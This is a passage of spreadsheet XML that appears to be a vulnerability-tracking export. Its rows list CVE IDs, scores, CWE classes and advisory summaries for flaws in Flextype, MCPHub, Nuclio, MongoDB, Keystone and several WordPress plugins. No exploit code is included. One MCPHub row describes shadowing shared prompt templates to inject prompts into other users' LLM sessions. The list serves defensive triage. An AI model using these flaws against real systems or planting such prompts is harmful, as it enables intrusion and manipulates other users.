          <t>Flextype CMS through v1.0.0-dev contains an expression language injection vulnerability that allows authenticated attackers with a valid API token to read arbitrary files by passing unsanitized user-supplied input to the Symfony ExpressionLanguage engine via the POST /api/v1/query endpoint. Attackers can leverage exposed application objects including filesystem() and serializers() within the evaluation scope to read arbitrary server files and achieve conditional remote code execution if a PHP file can be placed on disk through a secondary vector.</t>
        </is>
      </c>
      <c r="M3239" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77939</t>
        </is>
      </c>
    </row>
    <row r="3240">
      <c r="A3240" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3240" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78083</t>
        </is>
      </c>
      <c r="C3240" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3240" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3240" s="5" t="inlineStr"/>
      <c r="F3240" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3240" s="5" t="inlineStr"/>
      <c r="H3240" s="5" t="inlineStr"/>
      <c r="I3240" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3240" s="5" t="inlineStr"/>
      <c r="K3240" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L3240" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - joomshaper.com - Missing CSRF Token Verification in Property Booking and Agent Contact Endpoints in SP Property &lt; 4.1.4 - The visitor booking (properties.booking) and agent contact form submission (agents.sendmail) endpoints processed POST requests without verifying Joomla session anti-CSRF tokens.</t>
        </is>
      </c>
      <c r="M3240" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78083</t>
        </is>
      </c>
    </row>
    <row r="3241">
      <c r="A3241" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3241" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78134</t>
        </is>
      </c>
      <c r="C3241" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3241" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3241" s="5" t="inlineStr"/>
      <c r="F3241" s="5" t="inlineStr"/>
      <c r="G3241" s="5" t="inlineStr"/>
      <c r="H3241" s="5" t="inlineStr"/>
      <c r="I3241" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J3241" s="5" t="inlineStr"/>
      <c r="K3241" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L3241" s="5" t="inlineStr">
        <is>
          <t>strongSwan 4.5.0 through 6.0.7 has Incorrect Access Control in the eap-ttls and eap-peap plugins because there can be a missing or mismatched inner EAP identity.</t>
        </is>
      </c>
      <c r="M3241" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78134</t>
        </is>
      </c>
    </row>
    <row r="3242">
      <c r="A3242" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3242" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79617</t>
        </is>
      </c>
      <c r="C3242" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3242" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3242" s="5" t="inlineStr"/>
      <c r="F3242" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3242" s="5" t="inlineStr"/>
      <c r="H3242" s="5" t="inlineStr"/>
      <c r="I3242" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3242" s="5" t="inlineStr"/>
      <c r="K3242" s="5" t="inlineStr">
        <is>
          <t>CWE-732</t>
        </is>
      </c>
      <c r="L3242" s="5" t="inlineStr">
        <is>
          <t>Incorrect Permission Assignment for Critical Resource vulnerability in TÜBİTAK BİLGEM Software Technologies Research Institute Pardus LightDM Greeter allows Exploiting Incorrectly Configured Access Control Security Levels.
This issue affects Pardus LightDM Greeter: before 0.4.15.</t>
        </is>
      </c>
      <c r="M3242" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79617</t>
        </is>
      </c>
    </row>
    <row r="3243">
      <c r="A3243" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3243" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79745</t>
        </is>
      </c>
      <c r="C3243" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3243" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3243" s="5" t="inlineStr"/>
      <c r="F3243" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3243" s="5" t="inlineStr"/>
      <c r="H3243" s="5" t="inlineStr"/>
      <c r="I3243" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J3243" s="5" t="inlineStr"/>
      <c r="K3243" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3243" s="5" t="inlineStr">
        <is>
          <t>MCPHub is a unified hub for centrally managing and dynamically orchestrating multiple MCP servers/APIs into separate endpoints with flexible routing strategies. Prior to version 1.0.32, the built-in prompt and resource controllers perform no role checking. The mutating POST/PUT /api/prompts* and POST/PUT /api/resources* routes are attached to the authenticated router with no admin gate, and the handlers never read req.user. The DAO singletons they write are consulted first — ahead of any connected MCP server — for every session in handleGetPromptRequest / handleReadResourceRequest. A non-admin can therefore create, overwrite, and shadow global prompt templates and resources that all other users are served. The scored impact is the unauthorized integrity violation (creation/tampering/shadowing of globally-served records); stored prompt injection into other users' LLM sessions is a downstream consequence of that tampering. This issue has been patched in version 1.0.32.</t>
        </is>
      </c>
      <c r="M3243" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79745</t>
        </is>
      </c>
    </row>
    <row r="3244">
      <c r="A3244" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3244" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79747</t>
        </is>
      </c>
      <c r="C3244" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3244" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3244" s="5" t="inlineStr"/>
      <c r="F3244" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3244" s="5" t="inlineStr"/>
      <c r="H3244" s="5" t="inlineStr"/>
      <c r="I3244" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J3244" s="5" t="inlineStr"/>
      <c r="K3244" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L3244" s="5" t="inlineStr">
        <is>
          <t>MCPHub is a unified hub for centrally managing and dynamically orchestrating multiple MCP servers/APIs into separate endpoints with flexible routing strategies. Prior to version 1.0.32, an authenticated non-admin user can register a server pointing at an arbitrary URL and make the hub issue server-side requests to it, with no egress filtering (no block of loopback / RFC1918 / link-local 169.254.0.0/16). Via the OpenAPI proxy path the response body is returned to the caller (full, reflected SSRF); via the SSE/streamable-http transport the request is sent blind. This issue has been patched in version 1.0.32.</t>
        </is>
      </c>
      <c r="M3244" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79747</t>
        </is>
      </c>
    </row>
    <row r="3245">
      <c r="A3245" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3245" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79754</t>
        </is>
      </c>
      <c r="C3245" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3245" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3245" s="5" t="inlineStr"/>
      <c r="F3245" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3245" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H3245" s="5" t="inlineStr"/>
      <c r="I3245" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J3245" s="5" t="inlineStr"/>
      <c r="K3245" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="L3245" s="5" t="inlineStr">
        <is>
          <t>Nuclio is a "Serverless" framework for Real-Time Events and Data Processing. From version 1.6.19 to before version 1.17.2, Nuclio's Dashboard build pipeline does not sanitize the spec.build.tempDir field before using it to construct a shell command. When the Kaniko container builder is enabled, a user with function-create permission can inject shell metacharacters into this field and achieve arbitrary command execution inside the Dashboard container, which runs with a Kubernetes service account holding wildcard access to Secrets, Pods, Jobs, and Deployments in its namespace. This issue has been patched in version 1.17.2.</t>
        </is>
      </c>
      <c r="M3245" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79754</t>
        </is>
      </c>
    </row>
    <row r="3246">
      <c r="A3246" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3246" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79775</t>
        </is>
      </c>
      <c r="C3246" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3246" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3246" s="5" t="inlineStr"/>
      <c r="F3246" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3246" s="5" t="inlineStr"/>
      <c r="H3246" s="5" t="inlineStr"/>
      <c r="I3246" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J3246" s="5" t="inlineStr"/>
      <c r="K3246" s="5" t="inlineStr">
        <is>
          <t>CWE-129</t>
        </is>
      </c>
      <c r="L3246" s="5" t="inlineStr">
        <is>
          <t>rclone versions &gt;= v1.72.0 and &lt;= v1.74.4 (fixed in v1.75.0) contain multiple denial-of-service vulnerabilities in the archive backend's SquashFS parser, which relies on the github.com/diskfs/go-diskfs dependency. The parser fails to validate attacker-controlled superblock and metadata values before use. An attacker who can place or modify a SquashFS image in storage exposed through an rclone :archive: remote can craft a malicious image that triggers an integer division-by-zero panic (zero block size), an out-of-bounds slice panic (out-of-range inode metadata offset), or a non-progress CPU loop (truncated metadata stream). Variants 1 and 2 terminate the rclone process and, via 'rclone serve sftp', can crash the entire SFTP server; variant 3 causes sustained CPU consumption. Parsing is lazy, so a victim or remote client must address or descend into the malicious archive object to trigger it.</t>
        </is>
      </c>
      <c r="M3246" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79775</t>
        </is>
      </c>
    </row>
    <row r="3247">
      <c r="A3247" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3247" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80183</t>
        </is>
      </c>
      <c r="C3247" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3247" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3247" s="5" t="inlineStr"/>
      <c r="F3247" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3247" s="5" t="inlineStr"/>
      <c r="H3247" s="5" t="inlineStr"/>
      <c r="I3247" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J3247" s="5" t="inlineStr"/>
      <c r="K3247" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="L3247" s="5" t="inlineStr">
        <is>
          <t>In OpenStack Keystone before 29.0.3, any authenticated user holding role:reader on any project can list every project-scoped role assignment under any domain by passing a domain ID as scope.project.id with include_subtree to the GET /v3/role_assignments endpoint. The domain's project record has domain_id=null, causing the policy domain_id check to pass for any caller. With include_names, the response discloses the names and home-domain IDs of every user, group, project, and role involved. The literal "default" domain ID works against any deployment created with keystone-manage bootstrap. An attacker can harvest domain IDs from the response and repeat the query to map role assignments across the entire cloud. This is caused by misuse of "None" in 
list_role_assignments_for_tree.</t>
        </is>
      </c>
      <c r="M3247" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80183</t>
        </is>
      </c>
    </row>
    <row r="3248">
      <c r="A3248" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3248" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80380</t>
        </is>
      </c>
      <c r="C3248" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3248" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3248" s="5" t="inlineStr"/>
      <c r="F3248" s="5" t="inlineStr"/>
      <c r="G3248" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H3248" s="5" t="inlineStr"/>
      <c r="I3248" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3248" s="5" t="inlineStr"/>
      <c r="K3248" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L3248" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote attacker to perform unauthorized actions due to cross-site request forgery.</t>
        </is>
      </c>
      <c r="M3248" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80380</t>
        </is>
      </c>
    </row>
    <row r="3249">
      <c r="A3249" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3249" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81330</t>
        </is>
      </c>
      <c r="C3249" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3249" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3249" s="5" t="inlineStr"/>
      <c r="F3249" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3249" s="5" t="inlineStr"/>
      <c r="H3249" s="5" t="inlineStr"/>
      <c r="I3249" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3249" s="5" t="inlineStr"/>
      <c r="K3249" s="5" t="inlineStr">
        <is>
          <t>CWE-319</t>
        </is>
      </c>
      <c r="L3249" s="5" t="inlineStr">
        <is>
          <t>The C6 ear camera transmits live video to the EarVision Android application over unencrypted UDP streams. The application manifest permits cleartext traffic, and captured network traffic contains reconstructable JPEG or WEBP video frames transmitted over UDP. An attacker within local wireless range may capture and reconstruct the live video stream without transport encryption.</t>
        </is>
      </c>
      <c r="M3249" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81330</t>
        </is>
      </c>
    </row>
    <row r="3250">
      <c r="A3250" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3250" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81404</t>
        </is>
      </c>
      <c r="C3250" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3250" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3250" s="5" t="inlineStr"/>
      <c r="F3250" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3250" s="5" t="inlineStr"/>
      <c r="H3250" s="5" t="inlineStr"/>
      <c r="I3250" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J3250" s="5" t="inlineStr"/>
      <c r="K3250" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3250" s="5" t="inlineStr">
        <is>
          <t>The IPGP Visitors Origin WordPress plugin before 1.6 does not sanitise or escape user input before reflecting it back in the HTTP response, allowing unauthenticated attackers to perform Reflected Cross-Site Scripting attacks against users who are tricked into submitting a crafted request.</t>
        </is>
      </c>
      <c r="M3250" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81404</t>
        </is>
      </c>
    </row>
    <row r="3251">
      <c r="A3251" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3251" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81781</t>
        </is>
      </c>
      <c r="C3251" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3251" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3251" s="5" t="inlineStr"/>
      <c r="F3251" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3251" s="5" t="inlineStr"/>
      <c r="H3251" s="5" t="inlineStr"/>
      <c r="I3251" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3251" s="5" t="inlineStr"/>
      <c r="K3251" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3251" s="5" t="inlineStr">
        <is>
          <t>Missing Authorization vulnerability in Unbounce Unbounce Landing Pages unbounce allows Exploiting Incorrectly Configured Access Control Security Levels.
This issue affects Unbounce Landing Pages: from n/a through 1.1.4.</t>
        </is>
      </c>
      <c r="M3251" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81781</t>
        </is>
      </c>
    </row>
    <row r="3252">
      <c r="A3252" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3252" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81783</t>
        </is>
      </c>
      <c r="C3252" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3252" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3252" s="5" t="inlineStr"/>
      <c r="F3252" s="5" t="inlineStr"/>
      <c r="G3252" s="5" t="inlineStr"/>
      <c r="H3252" s="5" t="inlineStr"/>
      <c r="I3252" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3252" s="5" t="inlineStr"/>
      <c r="K3252" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="L3252" s="5" t="inlineStr">
        <is>
          <t>Subscriber Broken Authentication in MailMunch – Grow your Email List &lt;= 3.2.5 versions.</t>
        </is>
      </c>
      <c r="M3252" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81783</t>
        </is>
      </c>
    </row>
    <row r="3253">
      <c r="A3253" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3253" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81795</t>
        </is>
      </c>
      <c r="C3253" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3253" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3253" s="5" t="inlineStr"/>
      <c r="F3253" s="5" t="inlineStr"/>
      <c r="G3253" s="5" t="inlineStr"/>
      <c r="H3253" s="5" t="inlineStr"/>
      <c r="I3253" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3253" s="5" t="inlineStr"/>
      <c r="K3253" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3253" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in Page Visits Counter &amp;#8211; Lite &lt;= 1.2.3 versions.</t>
        </is>
      </c>
      <c r="M3253" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81795</t>
        </is>
      </c>
    </row>
    <row r="3254">
      <c r="A3254" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3254" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81798</t>
        </is>
      </c>
      <c r="C3254" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3254" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3254" s="5" t="inlineStr"/>
      <c r="F3254" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3254" s="5" t="inlineStr"/>
      <c r="H3254" s="5" t="inlineStr"/>
      <c r="I3254" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3254" s="5" t="inlineStr"/>
      <c r="K3254" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3254" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Easy Appointments allows DOM-Based XSS.
This issue affects Easy Appointments: from n/a through 4.0.2.1.</t>
        </is>
      </c>
      <c r="M3254" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81798</t>
        </is>
      </c>
    </row>
    <row r="3255">
      <c r="A3255" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3255" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82052</t>
        </is>
      </c>
      <c r="C3255" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3255" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3255" s="5" t="inlineStr"/>
      <c r="F3255" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3255" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H3255" s="5" t="inlineStr"/>
      <c r="I3255" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3255" s="5" t="inlineStr"/>
      <c r="K3255" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="L3255" s="5" t="inlineStr">
        <is>
          <t>The $regexFindAll expression can be used by an authenticated user who can run aggregation pipeline stages to crash a MongoDB server (mongod). Under certain specific conditions the  regex match can start in the middle of a multi-code-unit character, triggering an assertion during query execution.</t>
        </is>
      </c>
      <c r="M3255" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82052</t>
        </is>
      </c>
    </row>
    <row r="3256">
      <c r="A3256" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3256" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82054</t>
        </is>
      </c>
      <c r="C3256" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3256" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3256" s="5" t="inlineStr"/>
      <c r="F3256" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3256" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H3256" s="5" t="inlineStr"/>
      <c r="I3256" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3256" s="5" t="inlineStr"/>
      <c r="K3256" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L3256" s="5" t="inlineStr">
        <is>
          <t>A security issue exists in MongoDB server's JSON Pointer parser used during $jsonSchema query filter processing. When a find command includes a specially crafted $jsonSchema filter field, the parser processes the input without enforcing adequate limits on iteration count or total allocation size, resulting in significant memory amplification. Under concurrent request load, the cumulative memory consumption can exhaust available heap memory, causing the server's out-of-memory handler to terminate the mongod process and deny service to all connected clients.</t>
        </is>
      </c>
      <c r="M3256" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82054</t>
        </is>
      </c>
    </row>
    <row r="3257">
      <c r="A3257" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3257" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82055</t>
        </is>
      </c>
      <c r="C3257" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3257" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3257" s="5" t="inlineStr"/>
      <c r="F3257" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3257" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H3257" s="5" t="inlineStr"/>
      <c r="I3257" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3257" s="5" t="inlineStr"/>
      <c r="K3257" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="L3257" s="5" t="inlineStr">
        <is>
          <t>A security issue exists in MongoDB's 2dsphere index key generation that can cause a server crash due to a null pointer dereference. When a specially crafted GeoJSON document is inserted into a collection with a 2dsphere index, an inconsistency in geometry parsing can leave an internal object in an invalid, partially initialized state. During subsequent index key generation, access to this improperly initialized object results in a null pointer dereference that terminates the mongod process. An authenticated user with write access can use this to cause a denial of service.</t>
        </is>
      </c>
      <c r="M3257" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82055</t>
        </is>
      </c>
    </row>
    <row r="3258">
      <c r="A3258" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3258" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82057</t>
        </is>
      </c>
      <c r="C3258" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3258" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3258" s="5" t="inlineStr"/>
      <c r="F3258" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3258" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H3258" s="5" t="inlineStr"/>
      <c r="I3258" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3258" s="5" t="inlineStr"/>
      <c r="K3258" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="L3258" s="5" t="inlineStr">
        <is>
          <t>A security issue was discovered in MongoDB where an authenticated user with readWrite privileges could crash the mongod server process. By specifying a custom WiredTiger storage configuration option with an incompatible value during collection creation, a user could cause a type confusion in the storage engine layer. When documents were subsequently read from the misconfigured collection, the resulting mismatch in expected data format led to corrupted memory interpretation and a server crash. The crafted collection configuration persists across restarts, requiring manual operator intervention to remediate.</t>
        </is>
      </c>
      <c r="M3258" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82057</t>
        </is>
      </c>
    </row>
    <row r="3259">
      <c r="A3259" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3259" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82058</t>
        </is>
      </c>
      <c r="C3259" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3259" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3259" s="5" t="inlineStr"/>
      <c r="F3259" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3259" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H3259" s="5" t="inlineStr"/>
      <c r="I3259" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3259" s="5" t="inlineStr"/>
      <c r="K3259" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="L3259" s="5" t="inlineStr">
        <is>
          <t>A flaw in MongoDB's JSON Schema validation error generation code allows an authenticated user with readWrite privileges to crash the mongod server. When a BSON document containing an array with a malformed numeric field name fails a $jsonSchema items type constraint, the error generation path performs unsafe numeric conversion on the user-controlled field name without proper exception handling, resulting in an uncaught exception that terminates the server process. This is possible because incoming wire protocol BSON validation does not enforce that array element field names are valid, in-range numeric indices.</t>
        </is>
      </c>
      <c r="M3259" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82058</t>
        </is>
      </c>
    </row>
    <row r="3260">
      <c r="A3260" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3260" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82065</t>
        </is>
      </c>
      <c r="C3260" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3260" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3260" s="5" t="inlineStr"/>
      <c r="F3260" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3260" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H3260" s="5" t="inlineStr"/>
      <c r="I3260" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3260" s="5" t="inlineStr"/>
      <c r="K3260" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="L3260" s="5" t="inlineStr">
        <is>
